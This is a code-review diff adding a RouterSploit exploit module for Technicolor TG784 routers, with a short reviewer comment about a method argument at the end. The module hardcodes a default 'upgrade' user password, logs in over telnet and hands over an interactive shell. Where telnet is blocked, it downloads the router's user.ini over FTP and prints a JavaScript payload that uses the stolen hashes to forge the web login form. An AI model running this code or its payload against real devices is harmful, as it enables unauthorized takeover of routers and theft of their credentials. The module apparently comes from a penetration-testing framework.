routersploit/modules/exploits/technicolor/tg784_authbypass.py

```diff
@@ -0,0 +1,152 @@
+    remote_pass = exploits.Option('Th0ms0n!', 'Default FTP password for "upgrade" user')
+
+    config_path = exploits.Option('user.ini', 'Path to config file')
+
+    def run(self):
+        response = self.telnet_login()
+        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
+            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
+            print_status("FTP and HTTP service active")
+            creds = self.ftp_get_config()
+
+            if creds:
+                print_status("Use javascript console (through developer tools) to bypass authentication:")
+                payload = ('var user = "{}"\n'
+                           'var hash2 = "{}";\n'
+                           'var HA2 = MD5("GET" + ":" + uri);\n'
+                           'document.getElementById("user").value = user;\n'
+                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
+                           'document.authform.submit();\n')
+
+                for user in creds:
+                    print_success("User: {} Role: {}".format(user[0], user[2]))
+                    print_info(payload.format(user[0], user[3]))
+
+        elif '}=>' in response:
+            print_success("Successful authentication through Telnet service")
+            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
+            tn.read_until(': ')
+            tn.write(self.remote_user + '\r\n')
+            tn.read_until(': ')
+            tn.write(self.remote_pass + '\r\n')
+            tn.interact()
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        response = self.telnet_login()
+        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port) and self.ftp_get_config():
+            return True
+
+        elif '}=>' in response:
+            return True
+
+        return False
+
+    def telnet_login(self):
+        print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
+                                                                                          self.telnet_port,
+                                                                                          self.remote_user,
+                                                                                          self.remote_pass))
+        try:
+            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
+            tn.read_until(': ')
+            tn.write(self.remote_user + '\r\n')
+            tn.read_until(': ')
+            tn.write(self.remote_pass + '\r\n')
+            response = tn.read_until("Login not allowed", 10)
+            tn.close()
+        except:
+            return ""
+
+        return response
+
+    def is_port_opened(self, port):
```

Comment:
This is class method that have access to `self.port` is there any reason why we pass it as an argument?